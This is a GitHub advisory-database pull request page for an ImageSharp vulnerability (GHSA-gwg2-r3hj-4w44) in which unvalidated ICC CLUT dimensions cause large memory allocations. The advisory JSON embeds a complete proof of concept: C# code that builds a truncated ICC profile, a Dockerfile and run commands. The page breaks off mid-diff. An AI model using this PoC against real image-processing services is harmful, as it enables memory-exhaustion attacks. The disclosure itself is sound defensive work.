Skip to content

[GHSA-gwg2-r3hj-4w44] ImageSharp: ICC CLUT parsing allocates from unvalidated channel and grid dimensions - #10267

Open
JimBobSquarePants wants to merge 1 commit into
JimBobSquarePants/advisory-improvement-10267from
JimBobSquarePants-GHSA-gwg2-r3hj-4w44
Open

JimBobSquarePants wants to merge 1 commit into
JimBobSquarePants/advisory-improvement-10267from
JimBobSquarePants-GHSA-gwg2-r3hj-4w44

Conversation

@JimBobSquarePants

Copy link
Copy Markdown

Updates

  • Affected products
  • Description

Comments
The fix has been backported and released in ImageSharp 3.2.0. Split the affected ranges to exclude the fixed v3 release while preserving the existing v4 fix. The repository advisory has already been updated.

Release: https://github.com/SixLabors/ImageSharp/releases/tag/v3.2.0
Repository advisory: GHSA-gwg2-r3hj-4w44

@github

github commented Oct 9, 2026

Copy link
Copy Markdown
Collaborator

Hi there @JimBobSquarePants! A community member has suggested an improvement to your security advisory. If approved, this change will affect the global advisory listed at github.com/advisories. It will not affect the version listed in your project repository.

This change will be reviewed by our Security Curation Team. If you have thoughts or feedback, please share them in a comment here! If this PR has already been closed, you can start a new community contribution for this advisory

Copilot AI balanced review requested due to automatic review settings October 9, 2026 09:15
@github-actions
github-actions Bot changed the base branch from main to JimBobSquarePants/advisory-improvement-10267 October 9, 2026 09:16

Copilot AI left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🟡 Changes recommended

The advisory body still contains contradictory claims that all v3 releases are affected.

1 open finding
What changed in this PR

Updates the ImageSharp advisory to recognize the v3 backported fix.

Changes:

  • Adds 3.2.0 as the v3 patched release.
  • Splits affected ranges for v1–v3 and v4.
File Description
GHSA-gwg2-r3hj-4w44.json Updates patched-version guidance and affected ranges.

🧠 Review effort: Balanced


💡 Add a code-review agent skill or configure MCP servers for context-aware, tailored reviews. Learn more in the docs.

],
"summary": "ImageSharp: ICC CLUT parsing allocates from unvalidated channel and grid dimensions",
"details": "### Summary\n\nA malformed embedded ICC profile can make ImageSharp allocate memory from attacker-controlled CLUT channel and grid dimensions before verifying that the declared CLUT values are present.\n\nIn published v1 through v3 packages, the public lazy ICC parser allocates approximately 115 MB from the 200-byte test profile before rejecting the truncated tag. In published v4 packages, decoding with ICC conversion enabled requests an 860,934,420-byte managed float array from the same profile.\n\n### Affected package and versions\n\n- Package: `SixLabors.ImageSharp` (NuGet)\n- Affected range: `>= 1.0.0-beta0001, <= 4.1.1`\n- Commit `0815358f9202a78bc7f3b83e19282dc3654b500f` corresponds to release **v4.1.1**.\n\nThe parser defect is present from the first published NuGet prerelease, `1.0.0-beta0001`, through the latest published release, 4.1.1. The automatic `Image.Load` conversion path used by the main PoC exists in `>= 4.0.0, <= 4.1.1`; earlier versions expose the same parser defect through the public `IccProfile.Entries` accessor.\n### Details\n\nThe reproduced profile has an `A2B0` multi-process-elements (`mpet`) tag with a\n`clut` element declaring 15 input channels, 15 output channels, and three grid\npoints per input channel. [`ReadClutF32`](https://github.com/SixLabors/ImageSharp/blob/0815358f9202a78bc7f3b83e19282dc3654b500f/src/ImageSharp/Metadata/Profiles/ICC/DataReader/IccDataReader.Lut.cs#L139-L162)\ncomputes `3^15 * 15` and allocates that many floats before reading any CLUT\nvalues or verifying that the tag has enough remaining data. The supplied\n200-byte profile ends immediately after the CLUT grid descriptor.\n\nIn v4, the path is reached when an application decodes an embedded ICC profile using\n`DecoderOptions.ColorProfileHandling = ColorProfileHandling.Convert`. The\ndefault setting, `Preserve`, does not parse the profile for conversion.\n\nIn v1 through v3, `ReadClutF32` uses a jagged representation. Loading an ICC-bearing JPEG and then accessing `decoded.Metadata.IccProfile.Entries` reaches the public lazy parser. The malformed profile allocates the `3^15`-entry outer array before the missing CLUT values are detected.\n\n### Reproduction environment and result\n\nThe supplied automatic-conversion exploit and control were run against the published NuGet 4.1.1\n`net8.0` DLL in Docker on Debian 12 / Linux arm64 with .NET SDK 8.0.424 and\n.NET runtime 8.0.30. The same conversion fixture was run against published 4.0.0 and 4.1.0 with the same result.\n\nPublished 1.0.0, 2.0.0, 2.1.13, 3.0.0, and 3.1.12 were tested through public JPEG decode followed by `IccProfile.Entries`; each allocated approximately 114.9 MB, skipped the malformed tag, and exited normally. The published `1.0.0-beta0001` public `IccProfile(bytes).Entries` path allocated 114,813,528 bytes before a catchable managed bounds exception.\n\nOne exploit decode increased `GC.GetTotalAllocatedBytes(true)` by approximately\n861.5 million bytes, then returned\n`InvalidIccProfileException: Invalid conversion method`.\nThe reader catches the truncated-tag error and drops that tag. The identical\ninput with `ColorProfileHandling.Preserve` completed successfully with roughly\n0.5 million allocated bytes in the harness.\n\nOne complete exploit run produced:\n\n```text\nmode=exploit profile_bytes=200 requested_float_array=215233605 requested_bytes=860934420\nimagesharp_assembly=/work/bin/Release/net8.0/SixLabors.ImageSharp.dll\nimagesharp_version=4.1.1+0815358f9202a78bc7f3b83e19282dc3654b500f\nobserved_exception=SixLabors.ImageSharp.Metadata.Profiles.Icc.InvalidIccProfileException: Invalid conversion method.\nmanaged_bytes_allocated=861476416\nDocker exit status: 0\n```\n\nThe control from the same image produced:\n\n```text\nmode=control profile_bytes=200 requested_float_array=215233605 requested_bytes=860934420\nimagesharp_assembly=/work/bin/Release/net8.0/SixLabors.ImageSharp.dll\nimagesharp_version=4.1.1+0815358f9202a78bc7f3b83e19282dc3654b500f\ndecoded=1x1 icc_present=True\nmanaged_bytes_allocated=511888\nDocker exit status: 0\n```\n\nThe exact allocation counter includes runtime allocations and varies slightly\nbetween processes; the requested CLUT array itself is 860,934,420 bytes.\n\nNo active exploitation is known.\n\n### Impact\n\nThis report demonstrates a large attacker-controlled transient allocation in\nthe ICC conversion path. It does not demonstrate unhandled process termination:\nallocation failure is caught while parsing the malformed tag, so the impact\nshould be limited to memory pressure / input-validation failure unless a\nreproduction demonstrates a stronger result.\n\n\n### Complete PoC files\n\nProgram.cs:\n\n```csharp\nusing System;\nusing System.Buffers.Binary;\nusing System.IO;\nusing System.Reflection;\nusing SixLabors.ImageSharp;\nusing SixLabors.ImageSharp.Formats;\nusing SixLabors.ImageSharp.Formats.Png;\nusing SixLabors.ImageSharp.Metadata.Profiles.Icc;\nusing SixLabors.ImageSharp.PixelFormats;\n\nstatic class Program\n{\n private const int RequestedFloats = 215233605; // 3^15 * 15\n private const int RequestedBytes = RequestedFloats * sizeof(float);\n\n private static void U32(byte[] bytes, int offset, uint value) => BinaryPrimitives.WriteUInt32BigEndian(bytes.AsSpan(offset, 4), value);\n private static void U16(byte[] bytes, int offset, ushort value) => BinaryPrimitives.WriteUInt16BigEndian(bytes.AsSpan(offset, 2), value);\n private static void Ascii(byte[] bytes, int offset, string value) { for (int i = 0; i < value.Length; i++) bytes[offset + i] = (byte)value[i]; }\n\n // ICC v4 RGB profile containing an A2B0 mpet tag whose CLUT is deliberately\n // truncated after its grid descriptor. ReadClutF32 still sizes float[] from\n // the 15 untrusted input/output channels and the grid value of three.\n private static byte[] BuildTruncatedProfile()\n {\n const int tagOffset = 144;\n const int elementOffset = 168;\n byte[] profile = new byte[200];\n U32(profile, 0, (uint)profile.Length);\n Ascii(profile, 4, \"test\");\n U32(profile, 8, 0x04000000);\n U32(profile, 12, 0x6D6E7472); // display device\n U32(profile, 16, 0x52474220); // RGB\n U32(profile, 20, 0x58595A20); // XYZ\n Ascii(profile, 36, \"acsp\");\n U32(profile, 128, 1);\n U32(profile, 132, 0x41324230); // A2B0\n U32(profile, 136, tagOffset);\n U32(profile, 140, 56);\n U32(profile, tagOffset, 0x6D706574); // mpet\n U16(profile, tagOffset + 8, 0);\n U16(profile, tagOffset + 10, 0);\n U32(profile, tagOffset + 12, 1);\n U32(profile, tagOffset + 16, 24); // element offset relative to tag start\n U32(profile, tagOffset + 20, 32);\n U32(profile, elementOffset, 0x636C7574); // clut\n U16(profile, elementOffset + 4, 15);\n U16(profile, elementOffset + 6, 15);\n for (int i = 0; i < 15; i++) profile[elementOffset + 8 + i] = 3;\n return profile;\n }\n\n private static byte[] BuildPng(byte[] icc)\n {\n using var image = new Image<Rgba32>(1, 1);\n image.Metadata.IccProfile = new IccProfile(icc);\n using var output = new MemoryStream();\n image.Save(output, new PngEncoder());\n return output.ToArray();\n }\n\n public static int Main(string[] args)\n {\n string mode = args.Length == 1 ? args[0] : \"exploit\";\n if (mode is not (\"exploit\" or \"control\")) throw new ArgumentException(\"mode must be exploit or control\");\n Console.WriteLine($\"mode={mode} profile_bytes=200 requested_float_array={RequestedFloats} requested_bytes={RequestedBytes}\");\n Console.WriteLine($\"imagesharp_assembly={typeof(Image).Assembly.Location}\");\n Console.WriteLine($\"imagesharp_version={typeof(Image).Assembly.GetCustomAttribute<AssemblyInformationalVersionAttribute>()?.InformationalVersion}\");\n long before = GC.GetTotalAllocatedBytes(true);\n try\n {\n byte[] png = BuildPng(BuildTruncatedProfile());\n var options = new DecoderOptions\n {\n ColorProfileHandling = mode == \"exploit\" ? ColorProfileHandling.Convert : ColorProfileHandling.Preserve\n };\n using Image decoded = Image.Load(options, png);\n Console.WriteLine($\"decoded={decoded.Width}x{decoded.Height} icc_present={decoded.Metadata.IccProfile is not null}\");\n }\n catch (Exception exception)\n {\n Console.WriteLine($\"observed_exception={exception.GetType().FullName}: {exception.Message}\");\n }\n Console.WriteLine($\"managed_bytes_allocated={GC.GetTotalAllocatedBytes(true) - before}\");\n return 0;\n }\n}\n\n```\n\nProject file:\n\n```xml\n<Project Sdk=\"Microsoft.NET.Sdk\">\n <PropertyGroup>\n <OutputType>Exe</OutputType>\n <TargetFramework>net8.0</TargetFramework>\n <ImplicitUsings>disable</ImplicitUsings>\n <Nullable>enable</Nullable>\n </PropertyGroup>\n <ItemGroup>\n <Reference Include=\"SixLabors.ImageSharp\">\n <HintPath>/root/.nuget/packages/sixlabors.imagesharp/4.1.1/lib/net8.0/SixLabors.ImageSharp.dll</HintPath>\n <Private>true</Private>\n </Reference>\n <Reference Include=\"System.IO.Hashing\">\n <HintPath>/root/.nuget/packages/system.io.hashing/8.0.0/lib/net8.0/System.IO.Hashing.dll</HintPath>\n <Private>true</Private>\n </Reference>\n </ItemGroup>\n</Project>\n\n```\n\nDockerfile:\n\n```dockerfile\nFROM mcr.microsoft.com/dotnet/sdk:8.0\nWORKDIR /work\nCOPY gwg2.csproj Program.cs ./\n# Restore only to obtain the published package. The repro project then uses a\n# direct DLL reference so ImageSharp's package build target is not invoked.\nRUN printf '%s\\n' '<Project Sdk=\"Microsoft.NET.Sdk\"><PropertyGroup><TargetFramework>net8.0</TargetFramework></PropertyGroup><ItemGroup><PackageReference Include=\"SixLabors.ImageSharp\" Version=\"4.1.1\" /></ItemGroup></Project>' > fetch.csproj \\\n && dotnet restore fetch.csproj --nologo \\\n && rm fetch.csproj \\\n && dotnet build gwg2.csproj -c Release --nologo -v quiet\nENTRYPOINT [\"dotnet\", \"/work/bin/Release/net8.0/gwg2.dll\"]\n\n```\n\nRun:\n\n```sh\ndocker build -t imagesharp-gwg2-poc .\ndocker run --rm imagesharp-gwg2-poc exploit\ndocker run --rm imagesharp-gwg2-poc control\n```",
"details": "### Patched versions\n\nFixed in ImageSharp **3.2.0** and **4.1.2**. Users on v3 should upgrade to 3.2.0; users on v4 should upgrade to 4.1.2 or later.\n\n### Summary\n\nA malformed embedded ICC profile can make ImageSharp allocate memory from attacker-controlled CLUT channel and grid dimensions before verifying that the declared CLUT values are present.\n\nIn published v1 through v3 packages, the public lazy ICC parser allocates approximately 115 MB from the 200-byte test profile before rejecting the truncated tag. In published v4 packages, decoding with ICC conversion enabled requests an 860,934,420-byte managed float array from the same profile.\n\n### Affected package and versions\n\n- Package: `SixLabors.ImageSharp` (NuGet)\n- Affected ranges: `>= 1.0.0-beta0001, < 3.2.0` and `>= 4.0.0, < 4.1.2`\n- Commit `0815358f9202a78bc7f3b83e19282dc3654b500f` corresponds to release **v4.1.1**.\n\nThe parser defect is present from the first published NuGet prerelease, `1.0.0-beta0001`, through the latest published release, 4.1.1. The automatic `Image.Load` conversion path used by the main PoC exists in `>= 4.0.0, <= 4.1.1`; earlier versions expose the same parser defect through the public `IccProfile.Entries` accessor.\n### Details\n\nThe reproduced profile has an `A2B0` multi-process-elements (`mpet`) tag with a\n`clut` element declaring 15 input channels, 15 output channels, and three grid\npoints per input channel. [`ReadClutF32`](https://github.com/SixLabors/ImageSharp/blob/0815358f9202a78bc7f3b83e19282dc3654b500f/src/ImageSharp/Metadata/Profiles/ICC/DataReader/IccDataReader.Lut.cs#L139-L162)\ncomputes `3^15 * 15` and allocates that many floats before reading any CLUT\nvalues or verifying that the tag has enough remaining data. The supplied\n200-byte profile ends immediately after the CLUT grid descriptor.\n\nIn v4, the path is reached when an application decodes an embedded ICC profile using\n`DecoderOptions.ColorProfileHandling = ColorProfileHandling.Convert`. The\ndefault setting, `Preserve`, does not parse the profile for conversion.\n\nIn v1 through v3, `ReadClutF32` uses a jagged representation. Loading an ICC-bearing JPEG and then accessing `decoded.Metadata.IccProfile.Entries` reaches the public lazy parser. The malformed profile allocates the `3^15`-entry outer array before the missing CLUT values are detected.\n\n### Reproduction environment and result\n\nThe supplied automatic-conversion exploit and control were run against the published NuGet 4.1.1\n`net8.0` DLL in Docker on Debian 12 / Linux arm64 with .NET SDK 8.0.424 and\n.NET runtime 8.0.30. The same conversion fixture was run against published 4.0.0 and 4.1.0 with the same result.\n\nPublished 1.0.0, 2.0.0, 2.1.13, 3.0.0, and 3.1.12 were tested through public JPEG decode followed by `IccProfile.Entries`; each allocated approximately 114.9 MB, skipped the malformed tag, and exited normally. The published `1.0.0-beta0001` public `IccProfile(bytes).Entries` path allocated 114,813,528 bytes before a catchable managed bounds exception.\n\nOne exploit decode increased `GC.GetTotalAllocatedBytes(true)` by approximately\n861.5 million bytes, then returned\n`InvalidIccProfileException: Invalid conversion method`.\nThe reader catches the truncated-tag error and drops that tag. The identical\ninput with `ColorProfileHandling.Preserve` completed successfully with roughly\n0.5 million allocated bytes in the harness.\n\nOne complete exploit run produced:\n\n```text\nmode=exploit profile_bytes=200 requested_float_array=215233605 requested_bytes=860934420\nimagesharp_assembly=/work/bin/Release/net8.0/SixLabors.ImageSharp.dll\nimagesharp_version=4.1.1+0815358f9202a78bc7f3b83e19282dc3654b500f\nobserved_exception=SixLabors.ImageSharp.Metadata.Profiles.Icc.InvalidIccProfileException: Invalid conversion method.\nmanaged_bytes_allocated=861476416\nDocker exit status: 0\n```\n\nThe control from the same image produced:\n\n```text\nmode=control profile_bytes=200 requested_float_array=215233605 requested_bytes=860934420\nimagesharp_assembly=/work/bin/Release/net8.0/SixLabors.ImageSharp.dll\nimagesharp_version=4.1.1+0815358f9202a78bc7f3b83e19282dc3654b500f\ndecoded=1x1 icc_present=True\nmanaged_bytes_allocated=511888\nDocker exit status: 0\n```\n\nThe exact allocation counter includes runtime allocations and varies slightly\nbetween processes; the requested CLUT array itself is 860,934,420 bytes.\n\nNo active exploitation is known.\n\n### Impact\n\nThis report demonstrates a large attacker-controlled transient allocation in\nthe ICC conversion path. It does not demonstrate unhandled process termination:\nallocation failure is caught while parsing the malformed tag, so the impact\nshould be limited to memory pressure / input-validation failure unless a\nreproduction demonstrates a stronger result.\n\n\n### Complete PoC files\n\nProgram.cs:\n\n```csharp\nusing System;\nusing System.Buffers.Binary;\nusing System.IO;\nusing System.Reflection;\nusing SixLabors.ImageSharp;\nusing SixLabors.ImageSharp.Formats;\nusing SixLabors.ImageSharp.Formats.Png;\nusing SixLabors.ImageSharp.Metadata.Profiles.Icc;\nusing SixLabors.ImageSharp.PixelFormats;\n\nstatic class Program\n{\n private const int RequestedFloats = 215233605; // 3^15 * 15\n private const int RequestedBytes = RequestedFloats * sizeof(float);\n\n private static void U32(byte[] bytes, int offset, uint value) => BinaryPrimitives.WriteUInt32BigEndian(bytes.AsSpan(offset, 4), value);\n private static void U16(byte[] bytes, int offset, ushort value) => BinaryPrimitives.WriteUInt16BigEndian(bytes.AsSpan(offset, 2), value);\n private static void Ascii(byte[] bytes, int offset, string value) { for (int i = 0; i < value.Length; i++) bytes[offset + i] = (byte)value[i]; }\n\n // ICC v4 RGB profile containing an A2B0 mpet tag whose CLUT is deliberately\n // truncated after its grid descriptor. ReadClutF32 still sizes float[] from\n // the 15 untrusted input/output channels and the grid value of three.\n private static byte[] BuildTruncatedProfile()\n {\n const int tagOffset = 144;\n const int elementOffset = 168;\n byte[] profile = new byte[200];\n U32(profile, 0, (uint)profile.Length);\n Ascii(profile, 4, \"test\");\n U32(profile, 8, 0x04000000);\n U32(profile, 12, 0x6D6E7472); // display device\n U32(profile, 16, 0x52474220); // RGB\n U32(profile, 20, 0x58595A20); // XYZ\n Ascii(profile, 36, \"acsp\");\n U32(profile, 128, 1);\n U32(profile, 132, 0x41324230); // A2B0\n U32(profile, 136, tagOffset);\n U32(profile, 140, 56);\n U32(profile, tagOffset, 0x6D706574); // mpet\n U16(profile, tagOffset + 8, 0);\n U16(profile, tagOffset + 10, 0);\n U32(profile, tagOffset + 12, 1);\n U32(profile, tagOffset + 16, 24); // element offset relative to tag start\n U32(profile, tagOffset + 20, 32);\n U32(profile, elementOffset, 0x636C7574); // clut\n U16(profile, elementOffset + 4, 15);\n U16(profile, elementOffset + 6, 15);\n for (int i = 0; i < 15; i++) profile[elementOffset + 8 + i] = 3;\n return profile;\n }\n\n private static byte[] BuildPng(byte[] icc)\n {\n using var image = new Image<Rgba32>(1, 1);\n image.Metadata.IccProfile = new IccProfile(icc);\n using var output = new MemoryStream();\n image.Save(output, new PngEncoder());\n return output.ToArray();\n }\n\n public static int Main(string[] args)\n {\n string mode = args.Length == 1 ? args[0] : \"exploit\";\n if (mode is not (\"exploit\" or \"control\")) throw new ArgumentException(\"mode must be exploit or control\");\n Console.WriteLine($\"mode={mode} profile_bytes=200 requested_float_array={RequestedFloats} requested_bytes={RequestedBytes}\");\n Console.WriteLine($\"imagesharp_assembly={typeof(Image).Assembly.Location}\");\n Console.WriteLine($\"imagesharp_version={typeof(Image).Assembly.GetCustomAttribute<AssemblyInformationalVersionAttribute>()?.InformationalVersion}\");\n long before = GC.GetTotalAllocatedBytes(true);\n try\n {\n byte[] png = BuildPng(BuildTruncatedProfile());\n var options = new DecoderOptions\n {\n ColorProfileHandling = mode == \"exploit\" ? ColorProfileHandling.Convert : ColorProfileHandling.Preserve\n };\n using Image decoded = Image.Load(options, png);\n Console.WriteLine($\"decoded={decoded.Width}x{decoded.Height} icc_present={decoded.Metadata.IccProfile is not null}\");\n }\n catch (Exception exception)\n {\n Console.WriteLine($\"observed_exception={exception.GetType().FullName}: {exception.Message}\");\n }\n Console.WriteLine($\"managed_bytes_allocated={GC.GetTotalAllocatedBytes(true) - before}\");\n return 0;\n }\n}\n\n```\n\nProject file:\n\n```xml\n<Project Sdk=\"Microsoft.NET.Sdk\">\n <PropertyGroup>\n <OutputType>Exe</OutputType>\n <TargetFramework>net8.0</TargetFramework>\n <ImplicitUsings>disable</ImplicitUsings>\n <Nullable>enable</Nullable>\n </PropertyGroup>\n <ItemGroup>\n <Reference Include=\"SixLabors.ImageSharp\">\n <HintPath>/root/.nuget/packages/sixlabors.imagesharp/4.1.1/lib/net8.0/SixLabors.ImageSharp.dll</HintPath>\n <Private>true</Private>\n </Reference>\n <Reference Include=\"System.IO.Hashing\">\n <HintPath>/root/.nuget/packages/system.io.hashing/8.0.0/lib/net8.0/System.IO.Hashing.dll</HintPath>\n <Private>true</Private>\n </Reference>\n </ItemGroup>\n</Project>\n\n```\n\nDockerfile:\n\n```dockerfile\nFROM mcr.microsoft.com/dotnet/sdk:8.0\nWORKDIR /work\nCOPY gwg2.csproj Program.cs ./\n# Restore only to obtain the published package. The repro project then uses a\n# direct DLL reference so ImageSharp's package build target is not invoked.\nRUN printf '%s\\n' '<Project Sdk=\"Microsoft.NET.Sdk\"><PropertyGroup><TargetFramework>net8.0</TargetFramework></PropertyGroup><ItemGroup><PackageReference Include=\"SixLabors.ImageSharp\" Version=\"4.1.1\" /></ItemGroup></Project>' > fetch.csproj \\\n && dotnet restore fetch.csproj --nologo \\\n && rm fetch.csproj \\\n && dotnet build gwg2.csproj -c Release --nologo -v quiet\nENTRYPOINT [\"dotnet\", \"/work/bin/Release/net8.0/gwg2.dll\"]\n\n```\n\nRun:\n\n```sh\ndocker build -t imagesharp-gwg2-poc .\ndocker run --rm imagesharp-gwg2-poc exploit\ndocker run --rm imagesharp-gwg2-poc control\n```",
@JimBobSquarePants

JimBobSquarePants commented Oct 9, 2026 •

Copy link
Copy Markdown
Author

The review is correct. I have corrected the repository advisory description. Its current updated_at is 10/09/2026 11:34:05.

I cannot push to the GitHub-managed contribution branch (the Contents API returns HTTP 404 for the update). Please apply the following correction to this PR. It aligns the description with the existing affected ranges and sets modified to the repository advisory's actual update timestamp.

Exact JSON changes
--- a/advisories/github-reviewed/2026/10/GHSA-gwg2-r3hj-4w44/GHSA-gwg2-r3hj-4w44.json
+++ b/advisories/github-reviewed/2026/10/GHSA-gwg2-r3hj-4w44/GHSA-gwg2-r3hj-4w44.json
@@ -4 +4 @@
-  "modified": "2026-10-07T20:24:19Z",
+  "modified": "10/09/2026 11:34:05",
@@ -10 +10 @@
-  "details": "### Patched versions\n\nFixed in ImageSharp **3.2.0** and **4.1.2**. Users on v3 should upgrade to 3.2.0; users on v4 should upgrade to 4.1.2 or later.\n\n### Summary\n\nA malformed embedded ICC profile can make ImageSharp allocate memory from attacker-controlled CLUT channel and grid dimensions before verifying that the declared CLUT values are present.\n\nIn published v1 through v3 packages, the public lazy ICC parser allocates approximately 115 MB from the 200-byte test profile before rejecting the truncated tag. In published v4 packages, decoding with ICC conversion enabled requests an 860,934,420-byte managed float array from the same profile.\n\n### Affected package and versions\n\n- Package: `SixLabors.ImageSharp` (NuGet)\n- Affected ranges: `>= 1.0.0-beta0001, < 3.2.0` and `>= 4.0.0, < 4.1.2`\n- Commit `0815358f9202a78bc7f3b83e19282dc3654b500f` corresponds to release **v4.1.1**.\n\nThe parser defect is present from the first published NuGet prerelease, `1.0.0-beta0001`, through the latest published release, 4.1.1. The automatic `Image.Load` conversion path used by the main PoC exists in `>= 4.0.0, <= 4.1.1`; earlier versions expose the same parser defect through the public `IccProfile.Entries` accessor.\n### Details\n\nThe reproduced profile has an `A2B0` multi-process-elements (`mpet`) tag with a\n`clut` element declaring 15 input channels, 15 output channels, and three grid\npoints per input channel. [`ReadClutF32`](https://github.com/SixLabors/ImageSharp/blob/0815358f9202a78bc7f3b83e19282dc3654b500f/src/ImageSharp/Metadata/Profiles/ICC/DataReader/IccDataReader.Lut.cs#L139-L162)\ncomputes `3^15 * 15` and allocates that many floats before reading any CLUT\nvalues or verifying that the tag has enough remaining data. The supplied\n200-byte profile ends immediately after the CLUT grid descriptor.\n\nIn v4, the path is reached when an application decodes an embedded ICC profile using\n`DecoderOptions.ColorProfileHandling = ColorProfileHandling.Convert`. The\ndefault setting, `Preserve`, does not parse the profile for conversion.\n\nIn v1 through v3, `ReadClutF32` uses a jagged representation. Loading an ICC-bearing JPEG and then accessing `decoded.Metadata.IccProfile.Entries` reaches the public lazy parser. The malformed profile allocates the `3^15`-entry outer array before the missing CLUT values are detected.\n\n### Reproduction environment and result\n\nThe supplied automatic-conversion exploit and control were run against the published NuGet 4.1.1\n`net8.0` DLL in Docker on Debian 12 / Linux arm64 with .NET SDK 8.0.424 and\n.NET runtime 8.0.30. The same conversion fixture was run against published 4.0.0 and 4.1.0 with the same result.\n\nPublished 1.0.0, 2.0.0, 2.1.13, 3.0.0, and 3.1.12 were tested through public JPEG decode followed by `IccProfile.Entries`; each allocated approximately 114.9 MB, skipped the malformed tag, and exited normally. The published `1.0.0-beta0001` public `IccProfile(bytes).Entries` path allocated 114,813,528 bytes before a catchable managed bounds exception.\n\nOne exploit decode increased `GC.GetTotalAllocatedBytes(true)` by approximately\n861.5 million bytes, then returned\n`InvalidIccProfileException: Invalid conversion method`.\nThe reader catches the truncated-tag error and drops that tag. The identical\ninput with `ColorProfileHandling.Preserve` completed successfully with roughly\n0.5 million allocated bytes in the harness.\n\nOne complete exploit run produced:\n\n```text\nmode=exploit profile_bytes=200 requested_float_array=215233605 requested_bytes=860934420\nimagesharp_assembly=/work/bin/Release/net8.0/SixLabors.ImageSharp.dll\nimagesharp_version=4.1.1+0815358f9202a78bc7f3b83e19282dc3654b500f\nobserved_exception=SixLabors.ImageSharp.Metadata.Profiles.Icc.InvalidIccProfileException: Invalid conversion method.\nmanaged_bytes_allocated=861476416\nDocker exit status: 0\n```\n\nThe control from the same image produced:\n\n```text\nmode=control profile_bytes=200 requested_float_array=215233605 requested_bytes=860934420\nimagesharp_assembly=/work/bin/Release/net8.0/SixLabors.ImageSharp.dll\nimagesharp_version=4.1.1+0815358f9202a78bc7f3b83e19282dc3654b500f\ndecoded=1x1 icc_present=True\nmanaged_bytes_allocated=511888\nDocker exit status: 0\n```\n\nThe exact allocation counter includes runtime allocations and varies slightly\nbetween processes; the requested CLUT array itself is 860,934,420 bytes.\n\nNo active exploitation is known.\n\n### Impact\n\nThis report demonstrates a large attacker-controlled transient allocation in\nthe ICC conversion path. It does not demonstrate unhandled process termination:\nallocation failure is caught while parsing the malformed tag, so the impact\nshould be limited to memory pressure / input-validation failure unless a\nreproduction demonstrates a stronger result.\n\n\n### Complete PoC files\n\nProgram.cs:\n\n```csharp\nusing System;\nusing System.Buffers.Binary;\nusing System.IO;\nusing System.Reflection;\nusing SixLabors.ImageSharp;\nusing SixLabors.ImageSharp.Formats;\nusing SixLabors.ImageSharp.Formats.Png;\nusing SixLabors.ImageSharp.Metadata.Profiles.Icc;\nusing SixLabors.ImageSharp.PixelFormats;\n\nstatic class Program\n{\n    private const int RequestedFloats = 215233605; // 3^15 * 15\n    private const int RequestedBytes = RequestedFloats * sizeof(float);\n\n    private static void U32(byte[] bytes, int offset, uint value) => BinaryPrimitives.WriteUInt32BigEndian(bytes.AsSpan(offset, 4), value);\n    private static void U16(byte[] bytes, int offset, ushort value) => BinaryPrimitives.WriteUInt16BigEndian(bytes.AsSpan(offset, 2), value);\n    private static void Ascii(byte[] bytes, int offset, string value) { for (int i = 0; i < value.Length; i++) bytes[offset + i] = (byte)value[i]; }\n\n    // ICC v4 RGB profile containing an A2B0 mpet tag whose CLUT is deliberately\n    // truncated after its grid descriptor. ReadClutF32 still sizes float[] from\n    // the 15 untrusted input/output channels and the grid value of three.\n    private static byte[] BuildTruncatedProfile()\n    {\n        const int tagOffset = 144;\n        const int elementOffset = 168;\n        byte[] profile = new byte[200];\n        U32(profile, 0, (uint)profile.Length);\n        Ascii(profile, 4, \"test\");\n        U32(profile, 8, 0x04000000);\n        U32(profile, 12, 0x6D6E7472); // display device\n        U32(profile, 16, 0x52474220); // RGB\n        U32(profile, 20, 0x58595A20); // XYZ\n        Ascii(profile, 36, \"acsp\");\n        U32(profile, 128, 1);\n        U32(profile, 132, 0x41324230); // A2B0\n        U32(profile, 136, tagOffset);\n        U32(profile, 140, 56);\n        U32(profile, tagOffset, 0x6D706574); // mpet\n        U16(profile, tagOffset + 8, 0);\n        U16(profile, tagOffset + 10, 0);\n        U32(profile, tagOffset + 12, 1);\n        U32(profile, tagOffset + 16, 24); // element offset relative to tag start\n        U32(profile, tagOffset + 20, 32);\n        U32(profile, elementOffset, 0x636C7574); // clut\n        U16(profile, elementOffset + 4, 15);\n        U16(profile, elementOffset + 6, 15);\n        for (int i = 0; i < 15; i++) profile[elementOffset + 8 + i] = 3;\n        return profile;\n    }\n\n    private static byte[] BuildPng(byte[] icc)\n    {\n        using var image = new Image<Rgba32>(1, 1);\n        image.Metadata.IccProfile = new IccProfile(icc);\n        using var output = new MemoryStream();\n        image.Save(output, new PngEncoder());\n        return output.ToArray();\n    }\n\n    public static int Main(string[] args)\n    {\n        string mode = args.Length == 1 ? args[0] : \"exploit\";\n        if (mode is not (\"exploit\" or \"control\")) throw new ArgumentException(\"mode must be exploit or control\");\n        Console.WriteLine($\"mode={mode} profile_bytes=200 requested_float_array={RequestedFloats} requested_bytes={RequestedBytes}\");\n        Console.WriteLine($\"imagesharp_assembly={typeof(Image).Assembly.Location}\");\n        Console.WriteLine($\"imagesharp_version={typeof(Image).Assembly.GetCustomAttribute<AssemblyInformationalVersionAttribute>()?.InformationalVersion}\");\n        long before = GC.GetTotalAllocatedBytes(true);\n        try\n        {\n            byte[] png = BuildPng(BuildTruncatedProfile());\n            var options = new DecoderOptions\n            {\n                ColorProfileHandling = mode == \"exploit\" ? ColorProfileHandling.Convert : ColorProfileHandling.Preserve\n            };\n            using Image decoded = Image.Load(options, png);\n            Console.WriteLine($\"decoded={decoded.Width}x{decoded.Height} icc_present={decoded.Metadata.IccProfile is not null}\");\n        }\n        catch (Exception exception)\n        {\n            Console.WriteLine($\"observed_exception={exception.GetType().FullName}: {exception.Message}\");\n        }\n        Console.WriteLine($\"managed_bytes_allocated={GC.GetTotalAllocatedBytes(true) - before}\");\n        return 0;\n    }\n}\n\n```\n\nProject file:\n\n```xml\n<Project Sdk=\"Microsoft.NET.Sdk\">\n  <PropertyGroup>\n    <OutputType>Exe</OutputType>\n    <TargetFramework>net8.0</TargetFramework>\n    <ImplicitUsings>disable</ImplicitUsings>\n    <Nullable>enable</Nullable>\n  </PropertyGroup>\n  <ItemGroup>\n    <Reference Include=\"SixLabors.ImageSharp\">\n      <HintPath>/root/.nuget/packages/sixlabors.imagesharp/4.1.1/lib/net8.0/SixLabors.ImageSharp.dll</HintPath>\n      <Private>true</Private>\n    </Reference>\n    <Reference Include=\"System.IO.Hashing\">\n      <HintPath>/root/.nuget/packages/system.io.hashing/8.0.0/lib/net8.0/System.IO.Hashing.dll</HintPath>\n      <Private>true</Private>\n    